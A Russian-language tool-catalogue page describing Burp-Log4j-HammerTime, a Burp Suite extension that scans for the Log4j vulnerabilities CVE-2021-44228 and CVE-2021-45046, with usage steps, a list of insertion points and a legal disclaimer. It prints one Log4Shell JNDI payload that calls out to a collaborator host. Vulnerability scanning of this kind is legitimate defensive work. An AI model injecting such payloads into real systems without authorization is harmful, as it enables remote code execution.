Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Burp-Log4j-HammerTime — Расширение активного сканирования Burp для выявления уязвимостей Log4j CVE-2021-44228 и CVE-2021-45046 | Kitploit
Инструменты/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
Сканеры уязвимостейДинамический анализ (песочница)ЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Расширение активного сканирования Burp для выявления уязвимостей Log4j CVE-2021-44228 и CVE-2021-45046

Репозиторий
824 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4j-HammerTime

Это расширение Active Scanner для Burp Suite проверяет эксплуатацию уязвимостей Apache Log4j CVE-2021-44228 и CVE-2021-45046.

Это расширение использует Burp Collaborator для проверки уязвимости.

Использование

  • Включите это расширение
  • Запустите активное сканирование на конкретную цель

Если вы хотите запускать только проверки из этого модуля, вы можете импортировать профиль extensions-only.json и выбрать его в качестве профиля активного сканирования.

Детали

Во время активного сканирования в этом расширении пробуются следующие точки вставки:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

В каждой точке вставки в запрос внедряется следующая полезная нагрузка: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

Кроме того, это расширение добавляет множество заголовков, которые включены в headers (нераскомментированные строки). Эти заголовки внедряются по одному в отдельных запросах.

Правовое предупреждение

Этот проект создан только для образовательных и этических тестов. Использование Log4Shell-active-scanner для атаки на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут ответственности и не несут ответственности за любое неправомерное использование или ущерб, причиненный этой программой.

Лицензия

Проект лицензирован по лицензии MIT.

Авторы

  • Freskimo
Скачать инструмент